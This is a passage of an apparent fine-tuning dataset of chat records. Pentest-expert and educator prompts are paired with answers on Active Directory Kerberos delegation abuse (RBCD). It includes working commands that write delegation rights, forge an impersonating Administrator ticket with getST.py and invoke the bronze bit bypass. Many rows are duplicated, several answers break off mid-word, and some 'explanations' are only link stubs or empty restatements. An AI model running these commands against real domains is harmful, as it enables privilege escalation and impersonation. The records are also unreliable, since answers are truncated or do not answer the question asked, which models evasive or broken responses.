exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Get-ADComputer command for delegations - recon"}, {"role": "assistant", "content": "Get-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Get-ADComputer command for delegations - recon", "response": "Get-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount", "metadata": {"corpus_index": 534, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Get-ADComputer"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Delegations - Recon?"}, {"role": "assistant", "content": "Get-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Delegations - Recon?", "response": "Get-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount", "metadata": {"corpus_index": 534, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Get-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount`?"}, {"role": "assistant", "content": "This command is used for delegations - recon. Recon"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Get-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount`?", "response": "This command is used for delegations - recon. Recon", "metadata": {"corpus_index": 534, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Delegations - Unconstrained delegations (KUD)"}, {"role": "assistant", "content": "> [!TIP]\n> Read the (KUD) Unconstrained article for more insight\n\n![]()"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Delegations - Unconstrained delegations (KUD)", "response": "> [!TIP]\n> Read the (KUD) Unconstrained article for more insight\n\n![]()", "metadata": {"corpus_index": 535, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Delegations - Unconstrained delegations (KUD)"}, {"role": "assistant", "content": "> [!TIP]\n> Read the (KUD) Unconstrained article for more insight\n\n![]()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Delegations - Unconstrained delegations (KUD)", "response": "> [!TIP]\n> Read the (KUD) Unconstrained article for more insight\n\n![]()", "metadata": {"corpus_index": 535, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Delegations - Constrained delegations (KCD)?"}, {"role": "assistant", "content": "> [!TIP]\n> Read the (KCD) Constrained article for more insight\n\n![]()"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Delegations - Constrained delegations (KCD)?", "response": "> [!TIP]\n> Read the (KCD) Constrained article for more insight\n\n![]()", "metadata": {"corpus_index": 536, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Delegations - Constrained delegations (KCD)"}, {"role": "assistant", "content": "> [!TIP]\n> Read the (KCD) Constrained article for more insight\n\n![]()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Delegations - Constrained delegations (KCD)", "response": "> [!TIP]\n> Read the (KCD) Constrained article for more insight\n\n![]()", "metadata": {"corpus_index": 536, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Delegations - Resource-Based Constrained Delegations (RBCD)?"}, {"role": "assistant", "content": "> [!TIP]\n> Read the RBCD article for more insight\n\n![]()"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Delegations - Resource-Based Constrained Delegations (RBCD)?", "response": "> [!TIP]\n> Read the RBCD article for more insight\n\n![]()", "metadata": {"corpus_index": 537, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Delegations - Resource-Based Constrained Delegations (RBCD)?"}, {"role": "assistant", "content": "> [!TIP]\n> Read the RBCD article for more insight\n\n![]()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Delegations - Resource-Based Constrained Delegations (RBCD)?", "response": "> [!TIP]\n> Read the RBCD article for more insight\n\n![]()", "metadata": {"corpus_index": 537, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Delegations - Talk :microphone:"}, {"role": "assistant", "content": "> [!YOUTUBE] https://www.youtube.com/watch?v=byykEId3FUs\n\nhttps://docs.google.com/presentation/d/1rAl-XKrkuFjCpExHBGrp5L8ZwtuFFrOygZMapxMp28I/edit?usp=sharing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Delegations - Talk :microphone:", "response": "> [!YOUTUBE] https://www.youtube.com/watch?v=byykEId3FUs\n\nhttps://docs.google.com/presentation/d/1rAl-XKrkuFjCpExHBGrp5L8ZwtuFFrOygZMapxMp28I/edit?usp=sharing", "metadata": {"corpus_index": 538, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Delegations - Talk :microphone:?"}, {"role": "assistant", "content": "> [!YOUTUBE] https://www.youtube.com/watch?v=byykEId3FUs\n\nhttps://docs.google.com/presentation/d/1rAl-XKrkuFjCpExHBGrp5L8ZwtuFFrOygZMapxMp28I/edit?usp=sharing"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Delegations - Talk :microphone:?", "response": "> [!YOUTUBE] https://www.youtube.com/watch?v=byykEId3FUs\n\nhttps://docs.google.com/presentation/d/1rAl-XKrkuFjCpExHBGrp5L8ZwtuFFrOygZMapxMp28I/edit?usp=sharing", "metadata": {"corpus_index": 538, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain (RBCD) Resource-based constrained - Theory"}, {"role": "assistant", "content": "If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it populate that attribute, hence configuring that object for RBCD.\n\n> [!TIP]\n> Machine accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, hence allowing RBCD attacks on relayed machine accounts authentications.\n\nFor this attack to work, the attacker needs to populate the target attribute with the SID of an account that Kerberos can consider as a service. A service ticket will be asked for it. In short, the account must be either (see Kerberos tickets for more information about the following):\n\n* a user account having a ServicePrincipalName set\n* an account with a trailing $ in the sAMAccountName (i.e. a computer accounts)\n* any other account and conduct SPN-less RBCD with U2U (User-to-User) authentication\n\nThe common way to conduct these attacks is to create a computer account. This is usually possible thanks to a domain-level attribute called MachineAccountQuota that allows regular users to create up to 10 computer accounts.\n\n> [!TIP]\n> In 2022, Jame Forshaw demonstrated that the SPN requirement wasn't completely mandatory and RBCD could be operated without: Exploiting RBCD using a normal user. While this technique is a bit trickier and should absolutely be avoided on regular user accounts (the technique renders them unusable for normal people), it allows to abuse RBCD even if the MachineAccountQuota is set to 0. The technique is demonstrated later on in this page (RBCD on SPN-less user).\n\nThen, in order to abuse this, the attacker has to control the account (A) the target object's (B) attribute has been populated with. Using that account's (A) credentials, the attacker can obtain a ticket through S4U2Self and S4U2Proxy requests, just like constrained delegation with protocol transition.\n\nIn the end, an RBCD abuse results in a Service Tic"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain (RBCD) Resource-based constrained - Theory", "response": "If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it populate that attribute, hence configuring that object for RBCD.\n\n> [!TIP]\n> Machine accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, hence allowing RBCD attacks on relayed machine accounts authentications.\n\nFor this attack to work, the attacker needs to populate the target attribute with the SID of an account that Kerberos can consider as a service. A service ticket will be asked for it. In short, the account must be either (see Kerberos tickets for more information about the following):\n\n* a user account having a ServicePrincipalName set\n* an account with a trailing $ in the sAMAccountName (i.e. a computer accounts)\n* any other account and conduct SPN-less RBCD with U2U (User-to-User) authentication\n\nThe common way to conduct these attacks is to create a computer account. This is usually possible thanks to a domain-level attribute called MachineAccountQuota that allows regular users to create up to 10 computer accounts.\n\n> [!TIP]\n> In 2022, Jame Forshaw demonstrated that the SPN requirement wasn't completely mandatory and RBCD could be operated without: Exploiting RBCD using a normal user. While this technique is a bit trickier and should absolutely be avoided on regular user accounts (the technique renders them unusable for normal people), it allows to abuse RBCD even if the MachineAccountQuota is set to 0. The technique is demonstrated later on in this page (RBCD on SPN-less user).\n\nThen, in order to abuse this, the attacker has to control the account (A) the target object's (B) attribute has been populated with. Using that account's (A) credentials, the attacker can obtain a ticket through S4U2Self and S4U2Proxy requests, just like constrained delegation with protocol transition.\n\nIn the end, an RBCD abuse results in a Service Tic", "metadata": {"corpus_index": 539, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out (RBCD) Resource-based constrained - Theory during a pentest?"}, {"role": "assistant", "content": "If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it populate that attribute, hence configuring that object for RBCD.\n\n> [!TIP]\n> Machine accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, hence allowing RBCD attacks on relayed machine accounts authentications.\n\nFor this attack to work, the attacker needs to populate the target attribute with the SID of an account that Kerberos can consider as a service. A service ticket will be asked for it. In short, the account must be either (see Kerberos tickets for more information about the following):\n\n* a user account having a ServicePrincipalName set\n* an account with a trailing $ in the sAMAccountName (i.e. a computer accounts)\n* any other account and conduct SPN-less RBCD with U2U (User-to-User) authentication\n\nThe common way to conduct these attacks is to create a computer account. This is usually possible thanks to a domain-level attribute called MachineAccountQuota that allows regular users to create up to 10 computer accounts.\n\n> [!TIP]\n> In 2022, Jame Forshaw demonstrated that the SPN requirement wasn't completely mandatory and RBCD could be operated without: Exploiting RBCD using a normal user. While this technique is a bit trickier and should absolutely be avoided on regular user accounts (the technique renders them unusable for normal people), it allows to abuse RBCD even if the MachineAccountQuota is set to 0. The technique is demonstrated later on in this page (RBCD on SPN-less user).\n\nThen, in order to abuse this, the attacker has to control the account (A) the target object's (B) attribute has been populated with. Using that account's (A) credentials, the attacker can obtain a ticket through S4U2Self and S4U2Proxy requests, just like constrained delegation with protocol transition.\n\nIn the end, an RBCD abuse results in a Service Tic"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out (RBCD) Resource-based constrained - Theory during a pentest?", "response": "If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it populate that attribute, hence configuring that object for RBCD.\n\n> [!TIP]\n> Machine accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, hence allowing RBCD attacks on relayed machine accounts authentications.\n\nFor this attack to work, the attacker needs to populate the target attribute with the SID of an account that Kerberos can consider as a service. A service ticket will be asked for it. In short, the account must be either (see Kerberos tickets for more information about the following):\n\n* a user account having a ServicePrincipalName set\n* an account with a trailing $ in the sAMAccountName (i.e. a computer accounts)\n* any other account and conduct SPN-less RBCD with U2U (User-to-User) authentication\n\nThe common way to conduct these attacks is to create a computer account. This is usually possible thanks to a domain-level attribute called MachineAccountQuota that allows regular users to create up to 10 computer accounts.\n\n> [!TIP]\n> In 2022, Jame Forshaw demonstrated that the SPN requirement wasn't completely mandatory and RBCD could be operated without: Exploiting RBCD using a normal user. While this technique is a bit trickier and should absolutely be avoided on regular user accounts (the technique renders them unusable for normal people), it allows to abuse RBCD even if the MachineAccountQuota is set to 0. The technique is demonstrated later on in this page (RBCD on SPN-less user).\n\nThen, in order to abuse this, the attacker has to control the account (A) the target object's (B) attribute has been populated with. Using that account's (A) credentials, the attacker can obtain a ticket through S4U2Self and S4U2Proxy requests, just like constrained delegation with protocol transition.\n\nIn the end, an RBCD abuse results in a Service Tic", "metadata": {"corpus_index": 539, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe (RBCD) Resource-based constrained - Practice in the context of penetration testing"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nStep 1: edit the target's \"rbcd\" attribute (DACL abuse) :pencil2: \n\nImpacket's rbcd.py script (Python) can be used to read, write or clear the delegation rights, using the credentials of a domain user that has the needed permissions.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe (RBCD) Resource-based constrained - Practice in the context of penetration testing", "response": "::: tabs\n\n=== UNIX-like\n\nStep 1: edit the target's \"rbcd\" attribute (DACL abuse) :pencil2: \n\nImpacket's rbcd.py script (Python) can be used to read, write or clear the delegation rights, using the credentials of a domain user that has the needed permissions.\n\n```bash", "metadata": {"corpus_index": 540, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do (RBCD) Resource-based constrained - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nStep 1: edit the target's \"rbcd\" attribute (DACL abuse) :pencil2: \n\nImpacket's rbcd.py script (Python) can be used to read, write or clear the delegation rights, using the credentials of a domain user that has the needed permissions.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do (RBCD) Resource-based constrained - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nStep 1: edit the target's \"rbcd\" attribute (DACL abuse) :pencil2: \n\nImpacket's rbcd.py script (Python) can be used to read, write or clear the delegation rights, using the credentials of a domain user that has the needed permissions.\n\n```bash", "metadata": {"corpus_index": 540, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Read the attribute"}, {"role": "assistant", "content": "rbcd.py -delegate-to 'target$' -dc-ip 'DomainController' -action 'read' 'domain'/'PowerfulUser':'Password'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Read the attribute", "response": "rbcd.py -delegate-to 'target$' -dc-ip 'DomainController' -action 'read' 'domain'/'PowerfulUser':'Password'", "metadata": {"corpus_index": 541, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Read the attribute"}, {"role": "assistant", "content": "rbcd.py -delegate-to 'target$' -dc-ip 'DomainController' -action 'read' 'domain'/'PowerfulUser':'Password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Read the attribute", "response": "rbcd.py -delegate-to 'target$' -dc-ip 'DomainController' -action 'read' 'domain'/'PowerfulUser':'Password'", "metadata": {"corpus_index": 541, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity in the context of penetration testing"}, {"role": "assistant", "content": "rbcd.py -delegate-from 'controlledaccount' -delegate-to 'target$' -dc-ip 'DomainController' -action 'write' 'domain'/'PowerfulUser':'Password'\n``\n\n> [!SUCCESS]\n> Testers can also use ntlmrelayx to set the delegation rights with the --delegate-access option when conducting this attack from a relayed authentication.\n\n> [!TIP]\n> In this example, controlledaccount can be a computer account created for the attack, or any other account -with at least one Service Principal Name set for the usual technique, or without for SPN-less RBCD- which credentials are known to the attacker.\n\n---\nStep 2: obtain a ticket (delegation operation) :ticket: \n\nOnce the attribute has been modified, the Impacket script getST (Python) can then perform all the necessary steps to obtain the final \"impersonating\" ST (in this case, \"Administrator\" is impersonated but it can be any user in the environment).\n\n`bash\ngetST.py -spn 'cifs/target' -impersonate Administrator -dc-ip 'DomainController' 'domain/controlledaccountwithSPN:SomePassword'\n`\n\n> [!CAUTION]\n> In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the -force-forwardable option to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more service. This technique is automatically tried by Impacket scripts when doing pass-the-ticket.\n\n---\nStep 3: Pass-the-ticket :passport_control: \n\nOnce the ticket is obtained, it can be used with pass-the-ticket.\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the user impersonation part.\n\nStep 1: edit the target's \"rbcd\" attribute (DACL abuse) :pencil2: \n\nThe PowerShell ActiveDirectory module's cmdlets Se"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity in the context of penetration testing", "response": "rbcd.py -delegate-from 'controlledaccount' -delegate-to 'target$' -dc-ip 'DomainController' -action 'write' 'domain'/'PowerfulUser':'Password'\n``\n\n> [!SUCCESS]\n> Testers can also use ntlmrelayx to set the delegation rights with the --delegate-access option when conducting this attack from a relayed authentication.\n\n> [!TIP]\n> In this example, controlledaccount can be a computer account created for the attack, or any other account -with at least one Service Principal Name set for the usual technique, or without for SPN-less RBCD- which credentials are known to the attacker.\n\n---\nStep 2: obtain a ticket (delegation operation) :ticket: \n\nOnce the attribute has been modified, the Impacket script getST (Python) can then perform all the necessary steps to obtain the final \"impersonating\" ST (in this case, \"Administrator\" is impersonated but it can be any user in the environment).\n\n`bash\ngetST.py -spn 'cifs/target' -impersonate Administrator -dc-ip 'DomainController' 'domain/controlledaccountwithSPN:SomePassword'\n`\n\n> [!CAUTION]\n> In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the -force-forwardable option to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more service. This technique is automatically tried by Impacket scripts when doing pass-the-ticket.\n\n---\nStep 3: Pass-the-ticket :passport_control: \n\nOnce the ticket is obtained, it can be used with pass-the-ticket.\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the user impersonation part.\n\nStep 1: edit the target's \"rbcd\" attribute (DACL abuse) :pencil2: \n\nThe PowerShell ActiveDirectory module's cmdlets Se", "metadata": {"corpus_index": 542, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity?"}, {"role": "assistant", "content": "rbcd.py -delegate-from 'controlledaccount' -delegate-to 'target$' -dc-ip 'DomainController' -action 'write' 'domain'/'PowerfulUser':'Password'\n``\n\n> [!SUCCESS]\n> Testers can also use ntlmrelayx to set the delegation rights with the --delegate-access option when conducting this attack from a relayed authentication.\n\n> [!TIP]\n> In this example, controlledaccount can be a computer account created for the attack, or any other account -with at least one Service Principal Name set for the usual technique, or without for SPN-less RBCD- which credentials are known to the attacker.\n\n---\nStep 2: obtain a ticket (delegation operation) :ticket: \n\nOnce the attribute has been modified, the Impacket script getST (Python) can then perform all the necessary steps to obtain the final \"impersonating\" ST (in this case, \"Administrator\" is impersonated but it can be any user in the environment).\n\n`bash\ngetST.py -spn 'cifs/target' -impersonate Administrator -dc-ip 'DomainController' 'domain/controlledaccountwithSPN:SomePassword'\n`\n\n> [!CAUTION]\n> In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the -force-forwardable option to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more service. This technique is automatically tried by Impacket scripts when doing pass-the-ticket.\n\n---\nStep 3: Pass-the-ticket :passport_control: \n\nOnce the ticket is obtained, it can be used with pass-the-ticket.\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the user impersonation part.\n\nStep 1: edit the target's \"rbcd\" attribute (DACL abuse) :pencil2: \n\nThe PowerShell ActiveDirectory module's cmdlets Se"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity?", "response": "rbcd.py -delegate-from 'controlledaccount' -delegate-to 'target$' -dc-ip 'DomainController' -action 'write' 'domain'/'PowerfulUser':'Password'\n``\n\n> [!SUCCESS]\n> Testers can also use ntlmrelayx to set the delegation rights with the --delegate-access option when conducting this attack from a relayed authentication.\n\n> [!TIP]\n> In this example, controlledaccount can be a computer account created for the attack, or any other account -with at least one Service Principal Name set for the usual technique, or without for SPN-less RBCD- which credentials are known to the attacker.\n\n---\nStep 2: obtain a ticket (delegation operation) :ticket: \n\nOnce the attribute has been modified, the Impacket script getST (Python) can then perform all the necessary steps to obtain the final \"impersonating\" ST (in this case, \"Administrator\" is impersonated but it can be any user in the environment).\n\n`bash\ngetST.py -spn 'cifs/target' -impersonate Administrator -dc-ip 'DomainController' 'domain/controlledaccountwithSPN:SomePassword'\n`\n\n> [!CAUTION]\n> In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the -force-forwardable option to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more service. This technique is automatically tried by Impacket scripts when doing pass-the-ticket.\n\n---\nStep 3: Pass-the-ticket :passport_control: \n\nOnce the ticket is obtained, it can be used with pass-the-ticket.\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the user impersonation part.\n\nStep 1: edit the target's \"rbcd\" attribute (DACL abuse) :pencil2: \n\nThe PowerShell ActiveDirectory module's cmdlets Se", "metadata": {"corpus_index": 542, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity during 